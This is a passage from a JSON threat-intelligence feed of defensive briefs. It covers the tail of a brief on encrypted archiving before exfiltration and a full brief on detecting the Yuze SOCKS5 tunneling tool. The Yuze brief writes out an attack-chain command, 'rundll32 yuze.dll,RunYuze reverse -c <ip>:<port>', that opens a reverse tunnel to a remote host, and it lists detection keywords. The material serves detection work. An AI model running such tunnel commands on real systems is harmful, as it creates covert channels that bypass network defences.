intellectual property, and other confidential information. This can result in significant financial losses, reputational damage, legal liabilities, and regulatory fines for the victim organization. The number of victims and specific sectors targeted will vary depending on the attacker\u0026rsquo;s objectives and the nature of the compromised data.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Encrypting Files with WinRar or 7z - CommandLine\u0026rdquo; to your SIEM to detect the execution of WinRAR or 7-Zip with encryption parameters (rule:Detect Encrypting Files with WinRar or 7z - CommandLine).\u003c/li\u003e\n\u003cli\u003eEnable process creation logging with command line arguments in Sysmon to ensure the necessary data is available for detection (Data Source: Sysmon).\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rules to determine the scope and impact of the potential data exfiltration attempt (rule:Detect Encrypting Files with WinRar or 7z - CommandLine).\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for unusual outbound connections, particularly to cloud storage services or other external destinations, that may indicate data exfiltration.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-winrar-7zip-encryption/","summary":"Adversaries use WinRAR or 7-Zip with encryption options to compress and protect stolen data before exfiltration, making detection more challenging.","title":"Detection of Encrypted Archive Creation with WinRAR or 7-Zip","url":"https://feed.craftedsignal.io/briefs/2024-01-winrar-7zip-encryption/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Defender XDR","Elastic Defend","Elastic Endgame"],"_cs_severities":["medium"],"_cs_tags":["command-and-control","tunneling","yuze","proxy"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","Crowdstrike","SentinelOne"],"content_html":"\u003cp\u003eThis rule detects the execution of Yuze, an open-source tunneling tool written in C, which is commonly used for intranet penetration. Yuze supports both forward and reverse SOCKS5 proxy tunneling and is often executed using \u003ccode\u003erundll32\u003c/code\u003e to load \u003ccode\u003eyuze.dll\u003c/code\u003e with the \u003ccode\u003eRunYuze\u003c/code\u003e export. Threat actors can leverage Yuze to proxy command and control (C2) communications or to pivot within a network. The detection focuses on identifying processes with command-line arguments indicative of Yuze execution, specifically those involving \u0026ldquo;reverse,\u0026rdquo; \u0026ldquo;-c,\u0026rdquo; \u0026ldquo;proxy,\u0026rdquo; \u0026ldquo;fwd,\u0026rdquo; and \u0026ldquo;-l\u0026rdquo; parameters. This activity has been observed in real-world campaigns, increasing the importance of timely detection and response.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains initial access to a target system through various means (e.g., phishing, exploitation of vulnerabilities).\u003c/li\u003e\n\u003cli\u003eThe attacker uploads or drops the \u003ccode\u003eyuze.dll\u003c/code\u003e file onto the compromised host.\u003c/li\u003e\n\u003cli\u003eThe attacker uses \u003ccode\u003erundll32.exe\u003c/code\u003e to execute \u003ccode\u003eyuze.dll\u003c/code\u003e, calling the \u003ccode\u003eRunYuze\u003c/code\u003e export.\u003c/li\u003e\n\u003cli\u003eThe command line includes parameters to establish a reverse or forward SOCKS5 proxy tunnel (e.g., \u003ccode\u003erundll32 yuze.dll,RunYuze reverse -c \u0026lt;ip\u0026gt;:\u0026lt;port\u0026gt;\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eYuze establishes a tunnel to a remote server, allowing the attacker to proxy network traffic.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the established tunnel to pivot within the network and access internal resources.\u003c/li\u003e\n\u003cli\u003eThe attacker may proxy C2 traffic through the tunnel, masking the true origin of the commands.\u003c/li\u003e\n\u003cli\u003eThe attacker performs actions on the internal network, such as data exfiltration or lateral movement, using the tunnel as a covert channel.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to establish covert communication channels, bypass network security controls, and proxy malicious traffic, potentially leading to unauthorized access to sensitive data, lateral movement within the network, and data exfiltration. The use of Yuze can obscure the origin of attacks, making attribution more difficult and hindering incident response efforts.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Potential Yuze Tunneling via Rundll32\u0026rdquo; to your SIEM to detect the execution of \u003ccode\u003eyuze.dll\u003c/code\u003e via \u003ccode\u003erundll32.exe\u003c/code\u003e with specific command-line arguments.\u003c/li\u003e\n\u003cli\u003eEnable process creation logging (Sysmon Event ID 1 or Windows Security Auditing) to capture the necessary command-line information for the Sigma rules.\u003c/li\u003e\n\u003cli\u003eInvestigate any identified instances of \u003ccode\u003erundll32.exe\u003c/code\u003e executing \u003ccode\u003eyuze.dll\u003c/code\u003e, focusing on the parent processes and network connections.\u003c/li\u003e\n\u003cli\u003eBlock the C2/relay IP or domain found in the \u003ccode\u003e-c\u003c/code\u003e argument at DNS/firewall, as described in the Triage and Analysis section of the rule\u0026rsquo;s note.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-yuze-tunneling/","summary":"This alert detects potential protocol tunneling activity via the execution of Yuze, a lightweight open-source tunneling tool often used by threat actors for intranet penetration via forward and reverse SOCKS5 proxy tunneling.","title":"Potential Protocol Tunneling via Yuze","url":"https://feed.craftedsignal.io/briefs/2024-01-yuze-tunneling/"}],"language":"en","title":"CraftedSignal Threat Feed — Defender XDR","version":"https://jsonfeed.org/version/1.1"}